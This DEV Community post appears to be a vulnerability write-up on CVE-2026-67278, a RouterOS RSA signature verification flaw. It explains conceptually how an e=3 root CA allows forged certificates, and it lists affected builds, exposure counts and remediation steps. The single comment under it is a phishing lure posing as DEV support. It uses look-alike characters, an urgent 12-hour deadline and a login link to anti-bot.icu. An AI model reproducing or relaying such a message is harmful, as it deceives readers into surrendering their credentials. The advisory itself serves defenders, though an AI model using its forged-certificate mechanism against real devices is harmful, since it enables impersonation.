DEV Community

kozhevniko
kozhevniko

Posted on

Assessing CVE-2026-67278 Risk: Why Trust Failures Outrank Their CVSS Label

Assessing CVE-2026-67278 Risk: Why Trust Failures Outrank Their CVSS Label

Vulnerability overview

CVE-2026-67278 is a MikroTik RouterOS 7.x RSA/PKCS#1 v1.5 verification flaw that CERT Polska published on 5 September 2026. RouterOS accepts malformed signatures across TLS/X.509 certificate validation and RSA SSH host-key authentication. RouterOS 7.23.6 (long-term) and 7.24.3 (stable) carry the complete fix.

Mechanism and exploitation conditions

The device trust store contains a root CA certificate with public exponent e=3. An attacker who controls or redirects an outbound TLS connection can use that public certificate, without the private key, to forge a trusted intermediate and mint certificates for arbitrary host names. RSA-based SSH authentication shares the same permissive check. A network position and an unpatched build are both required, and no confirmed exploitation of this CVE has been published.

Impact

Trust failures are awkward to score because nothing crashes. The practical effects are server impersonation on outbound connections and weakened RSA SSH host-key assurance. For an environment where routers reach update, telemetry or management endpoints on their own initiative, that is a durable weakening of the identity model the rest of the control set assumes.

Affected products and scope

RouterOS 7.x only: from 7.0.0 before 7.23.6, and from 7.24 before 7.24.3. Fixed in 7.23.6 and 7.24.3. The 7.23.4 and 7.24.2 builds contained an incomplete fix, and the 6.x branch is outside the published range.

Exposure context

ZoomEye reported 9,559 assets for os="RouterOS" && service="ssh" on 23 September 2026, while vul.cve="CVE-2026-67278" returned 0. The product figure counts RouterOS SSH fingerprints rather than confirmed vulnerable devices, and the zero CVE figure does not establish absence. Search link: https://www.zoomeye.ai/searchResult?q=b3M9IlJvdXRlck9TIiAmJiBzZXJ2aWNlPSJzc2gi

Remediation and mitigations

  1. Upgrade to 7.23.6 or 7.24.3, then confirm the exact build string per device.
  2. Prioritise devices that make outbound TLS connections to systems you depend on.
  3. Where an upgrade must wait, restrict reachability and record the accepted risk explicitly.
  4. Re-examine automation that trusts device identity, since that assumption has been weakened.
  5. Keep 7.23.4 and 7.24.2 out of any "remediated" inventory.

References

Top comments (1)

Collapse
 
supportdev profile image
DEV SUPPORTS •

Dear User,
Due to аn increasе in bot actіvity оn thе platform, wе require verify оf уоur account.
Рleаsе log іn viа the lіnk below:
• anti-bot.icu/5K0N5G7M9C4
Verificated deаdline - 12 hours.
Sincerely,Dev Supрort

‍‌‍ ‌